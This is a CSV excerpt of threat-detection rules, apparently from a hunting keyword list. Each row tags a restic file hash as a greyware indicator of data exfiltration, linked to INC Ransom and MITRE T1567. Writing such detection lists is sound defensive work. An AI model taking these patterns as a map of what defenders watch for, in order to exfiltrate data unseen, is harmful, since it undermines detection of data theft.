"*c3224f8327d7cf805b9447314f6066bec357dce64c60a0937aa3b8eb1458c496*",".{0,1000}c3224f8327d7cf805b9447314f6066bec357dce64c60a0937aa3b8eb1458c496.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c390aca094d308acc9e06e4375915c05c9aa1bb67e407e86a6b77e59de694469*",".{0,1000}c390aca094d308acc9e06e4375915c05c9aa1bb67e407e86a6b77e59de694469.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c400a97000f7567515c3ffa560694f83927c8a77add8da737f567b2ff3812054*",".{0,1000}c400a97000f7567515c3ffa560694f83927c8a77add8da737f567b2ff3812054.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c4677e4eaf38ceda97841c8cae883883e026751970b41bb1a3f5e0610e07a5b1*",".{0,1000}c4677e4eaf38ceda97841c8cae883883e026751970b41bb1a3f5e0610e07a5b1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c47c3409ede8542ee139232513fe3f1c30b0360bce5d33f65fab9a32f9abb802*",".{0,1000}c47c3409ede8542ee139232513fe3f1c30b0360bce5d33f65fab9a32f9abb802.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c4c8c47da78cce55a75fb1bd7f528ba5eb4a2e2f96ae1927a705bac7eebde224*",".{0,1000}c4c8c47da78cce55a75fb1bd7f528ba5eb4a2e2f96ae1927a705bac7eebde224.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c53a614a1a1536db55204e938e84708de9f18c42b613a470e46d433fd83a6db0*",".{0,1000}c53a614a1a1536db55204e938e84708de9f18c42b613a470e46d433fd83a6db0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c5d39c81e4ab9e8ec45e8cd742d449ceb944b73fe90cd24aaff3d89bc7ebb3e4*",".{0,1000}c5d39c81e4ab9e8ec45e8cd742d449ceb944b73fe90cd24aaff3d89bc7ebb3e4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c5eca1ce456b855510b7da24a0204941c5d7a516da8b8b5af6a88f258a1994f5*",".{0,1000}c5eca1ce456b855510b7da24a0204941c5d7a516da8b8b5af6a88f258a1994f5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c6f0b7931f8df1223c5edb6adef3919350e1eec95c9493748fb995c2d968f672*",".{0,1000}c6f0b7931f8df1223c5edb6adef3919350e1eec95c9493748fb995c2d968f672.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c703e6aa71038579068c826ba7f8cabdfa61de7345f389cbcbf779ef5c3e0767*",".{0,1000}c703e6aa71038579068c826ba7f8cabdfa61de7345f389cbcbf779ef5c3e0767.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c7652b1555ab67b927ea24b856f1a81cbd21067afbbce16ee6db88022714dfde*",".{0,1000}c7652b1555ab67b927ea24b856f1a81cbd21067afbbce16ee6db88022714dfde.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c792d1729f05d22140c7e71092c3ba3314d7a9b2cdd9022160b60574e50a9826*",".{0,1000}c792d1729f05d22140c7e71092c3ba3314d7a9b2cdd9022160b60574e50a9826.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c7dca90fb6fd83cee8b9f6a2776f5839794341af1953d251bf06a91870be7a8e*",".{0,1000}c7dca90fb6fd83cee8b9f6a2776f5839794341af1953d251bf06a91870be7a8e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c7e58365d0b888a60df772e7857ce8a0b53912bbd287582e865e3c5e17db723f*",".{0,1000}c7e58365d0b888a60df772e7857ce8a0b53912bbd287582e865e3c5e17db723f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c816973d0005248a7c6112026d9fa942e8e755748f60fd4a7b0b5ca4d578bd74*",".{0,1000}c816973d0005248a7c6112026d9fa942e8e755748f60fd4a7b0b5ca4d578bd74.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c83782cfec55c5787d0a2f1dbaa3e4fb36eed7c164036fcabc1813ab314f1932*",".{0,1000}c83782cfec55c5787d0a2f1dbaa3e4fb36eed7c164036fcabc1813ab314f1932.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c87e364b795ed06a18e5d54ac07ab31d11f343d66bdb5779df4d48ad915850a1*",".{0,1000}c87e364b795ed06a18e5d54ac07ab31d11f343d66bdb5779df4d48ad915850a1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c8da7350dc334cd5eaf13b2c9d6e689d51e7377ba1784cc6d65977bd44ee1165*",".{0,1000}c8da7350dc334cd5eaf13b2c9d6e689d51e7377ba1784cc6d65977bd44ee1165.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c933ac96b502a02dbac31a1b1e08cd9e950274b9cfeae80eef0ef59a1157aa48*",".{0,1000}c933ac96b502a02dbac31a1b1e08cd9e950274b9cfeae80eef0ef59a1157aa48.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ca5a7ecdd5f4a8c6315555fb446496b2085137d6d38e56a0d1318c5e1d80db1a*",".{0,1000}ca5a7ecdd5f4a8c6315555fb446496b2085137d6d38e56a0d1318c5e1d80db1a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*cad474e11c4a63c30d9807392c649acf15736fcb729e1a42f1b63a1a062ef62a*",".{0,1000}cad474e11c4a63c30d9807392c649acf15736fcb729e1a42f1b63a1a062ef62a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*cb5044ef22deef19afcaa1d37da6d2d1e89a21f5cff3e77ad7c47ad8da1a8a7b*",".{0,1000}cb5044ef22deef19afcaa1d37da6d2d1e89a21f5cff3e77ad7c47ad8da1a8a7b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*cc53f743f393cd710a36b8842793843a08b102b603213f0ef43b58c19ff01147*",".{0,1000}cc53f743f393cd710a36b8842793843a08b102b603213f0ef43b58c19ff01147.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*cc90db8e72fb9f65c61b95463c245e7836a8fd7ac375b79dc1b01d2bff1a5bd6*",".{0,1000}cc90db8e72fb9f65c61b95463c245e7836a8fd7ac375b79dc1b01d2bff1a5bd6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*cc99b5463667c5a85d430ad159b1780d63b61d4bdd08b56f5ecabdb264679408*",".{0,1000}cc99b5463667c5a85d430ad159b1780d63b61d4bdd08b56f5ecabdb264679408.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ccb0d8983c1937aded1f217dd002be4ee9d274cbd0e775d596767ca3954090cc*",".{0,1000}ccb0d8983c1937aded1f217dd002be4ee9d274cbd0e775d596767ca3954090cc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ccc327a0e562c42e1067d7082e00d89bb37bb5baf5433c0c775ae8dbf2a6463d*",".{0,1000}ccc327a0e562c42e1067d7082e00d89bb37bb5baf5433c0c775ae8dbf2a6463d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ccefaabe2451d9b11d6fb57bd449b60526a760b6ed92bc6bf3614858dbb861d6*",".{0,1000}ccefaabe2451d9b11d6fb57bd449b60526a760b6ed92bc6bf3614858dbb861d6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*cd4a93475e0410a506f0453e5b884b2b31f64d0ea65f287c97b34737232b2768*",".{0,1000}cd4a93475e0410a506f0453e5b884b2b31f64d0ea65f287c97b34737232b2768.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*cdd52658f4836d8767e267931a90bd187a8d81c4a0df548cf0c4056bd5fa73fa*",".{0,1000}cdd52658f4836d8767e267931a90bd187a8d81c4a0df548cf0c4056bd5fa73fa.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*cf22ddc0de9ed5121eea525f5a701fbf7581b515372884d3c27c6ab6becb7d92*",".{0,1000}cf22ddc0de9ed5121eea525f5a701fbf7581b515372884d3c27c6ab6becb7d92.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*cf7f543c3e8144b822f184d610284ef2986e9a9fe4482c377e71d7de0eee6336*",".{0,1000}cf7f543c3e8144b822f184d610284ef2986e9a9fe4482c377e71d7de0eee6336.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*cffe4f305bd8e92604ee54b41ecf0f280756c25ca65170e1e8da031a3e269745*",".{0,1000}cffe4f305bd8e92604ee54b41ecf0f280756c25ca65170e1e8da031a3e269745.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*d0cb6aee67e6002397f2a03aad19364e456d597ca2c632087530d19c8620e0b2*",".{0,1000}d0cb6aee67e6002397f2a03aad19364e456d597ca2c632087530d19c8620e0b2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*d0f33de8e813474ae320912f13a929d763aa012d38c706fb76a46d9c7212f7f5*",".{0,1000}d0f33de8e813474ae320912f13a929d763aa012d38c706fb76a46d9c7212f7f5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*d1082f06795f50679df66d5bb31b29f7d02e7932ae0da48a972edbfcc067be90*",".{0,1000}d1082f06795f50679df66d5bb31b29f7d02e7932ae0da48a972edbfcc067be90.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*d166b7b1c5a74e9b9b4de99113c7a8e563a782d17664c2ffbb7e721df1062ef5*",".{0,1000}d166b7b1c5a74e9b9b4de99113c7a8e563a782d17664c2ffbb7e721df1062ef5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*d18c1c2f4445bacac3a8bb9bf32d450a25028a7c94b30a1bc040942a5b47f661*",".{0,1000}d18c1c2f4445bacac3a8bb9bf32d450a25028a7c94b30a1bc040942a5b47f661.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*d20f3e5c4081117ace9966329f8460b8c24ff862794a98233b4b23024b9efe58*",".{0,1000}d20f3e5c4081117ace9966329f8460b8c24ff862794a98233b4b23024b9efe58.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*d286f6313ade8206ad883cc2c55605964dbf469524cec7116a736d11d389eac9*",".{0,1000}d286f6313ade8206ad883cc2c55605964dbf469524cec7116a736d11d389eac9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*d3afed5d69df35d875e4243cd45f9f539a69c48c8f19f9e59ecc4b2422dfdb4e*",".{0,1000}d3afed5d69df35d875e4243cd45f9f539a69c48c8f19f9e59ecc4b2422dfdb4e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*d3ebd06d4b88d5e4393e19b093fc74c773cd41db3d3a04662864934d5cf7dd05*",".{0,1000}d3ebd06d4b88d5e4393e19b093fc74c773cd41db3d3a04662864934d5cf7dd05.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*d40270cb6d23e194a1ecb483a41ed42d9edf803b6c207b7599ff5813036f5e5e*",".{0,1000}d40270cb6d23e194a1ecb483a41ed42d9edf803b6c207b7599ff5813036f5e5e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*d4b4b82d0662242a987ebeb97286034aaebfff210180986e023a56513a1a300f*",".{0,1000}d4b4b82d0662242a987ebeb97286034aaebfff210180986e023a56513a1a300f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*d4c1b56d9fb1ef2a6e3f9475a9a0ef9fa822a3e47dff1c3ca4ddba2b3ff0e68b*",".{0,1000}d4c1b56d9fb1ef2a6e3f9475a9a0ef9fa822a3e47dff1c3ca4ddba2b3ff0e68b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*d5306863ae3c851f030b46f8a01db4595170dc8a875bf7e527d697ae122ae1bd*",".{0,1000}d5306863ae3c851f030b46f8a01db4595170dc8a875bf7e527d697ae122ae1bd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*d736a57972bb7ee3398cf6b45f30e5455d51266f5305987534b45a4ef505f965*",".{0,1000}d736a57972bb7ee3398cf6b45f30e5455d51266f5305987534b45a4ef505f965.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*d7eee6b4038ca7d25bd062a2fabcf5d2c5683a9e59623d6a6a25472ed877f78f*",".{0,1000}d7eee6b4038ca7d25bd062a2fabcf5d2c5683a9e59623d6a6a25472ed877f78f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*d885e7309ccdb44151ee091e2b75c54cdcb02b701ff6e4de6217afad5eb30e6e*",".{0,1000}d885e7309ccdb44151ee091e2b75c54cdcb02b701ff6e4de6217afad5eb30e6e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*d90e2fb20e7db4b605b0de5eac4f830f38f94fc2093cca54cb6eb7b4c46d68fa*",".{0,1000}d90e2fb20e7db4b605b0de5eac4f830f38f94fc2093cca54cb6eb7b4c46d68fa.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*dae5e6e39107a66dc5c8ea59f6f27b16c54bd6be31f57e3281f6d87de30e05b0*",".{0,1000}dae5e6e39107a66dc5c8ea59f6f27b16c54bd6be31f57e3281f6d87de30e05b0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*db351869cc3fdf6b88678f72515adc4ce5600462880100306d5597eb3e2ed516*",".{0,1000}db351869cc3fdf6b88678f72515adc4ce5600462880100306d5597eb3e2ed516.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*db9de96c8020db93542e0abe95168831257d9ab6e68ff0430e28deb019e31640*",".{0,1000}db9de96c8020db93542e0abe95168831257d9ab6e68ff0430e28deb019e31640.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*dba96683300231f309727df9f7aa6648bd50d67ae0babf6c3304ab212bd40d39*",".{0,1000}dba96683300231f309727df9f7aa6648bd50d67ae0babf6c3304ab212bd40d39.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*dd420764e615be9eeca958d60c1adf0e7ed806d2de93f9638b5af105ffd7f007*",".{0,1000}dd420764e615be9eeca958d60c1adf0e7ed806d2de93f9638b5af105ffd7f007.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*dd518c110de3900f1df5bc5b042508e85ece12f4906e5868803e1a00fc2aa2ac*",".{0,1000}dd518c110de3900f1df5bc5b042508e85ece12f4906e5868803e1a00fc2aa2ac.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ddf89e5b9fd98708bf83fb8bbfb3c7baed2d5183035bfc0c794507d509235072*",".{0,1000}ddf89e5b9fd98708bf83fb8bbfb3c7baed2d5183035bfc0c794507d509235072.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ddfa313aa3d4038579635361c32c98d8a885e8e9b7f53224dd0df22b42fa618d*",".{0,1000}ddfa313aa3d4038579635361c32c98d8a885e8e9b7f53224dd0df22b42fa618d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*de63f778f0650db9c0c00c3772d7f87a6c21ca64e1249e55392ecbeb9bc352a3*",".{0,1000}de63f778f0650db9c0c00c3772d7f87a6c21ca64e1249e55392ecbeb9bc352a3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*dea0f108ba1485baca081dcb34a83c472a0bfa75e4f8483d3c2fce06229fb06b*",".{0,1000}dea0f108ba1485baca081dcb34a83c472a0bfa75e4f8483d3c2fce06229fb06b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*def06c3e5b0c881be0f66be65c9e78fd8d867d42acc12e60a290a6a76c2b4d77*",".{0,1000}def06c3e5b0c881be0f66be65c9e78fd8d867d42acc12e60a290a6a76c2b4d77.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*def48c83f905c40247c041df1797df5ee70a2b233f15f559df160960edbb150f*",".{0,1000}def48c83f905c40247c041df1797df5ee70a2b233f15f559df160960edbb150f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
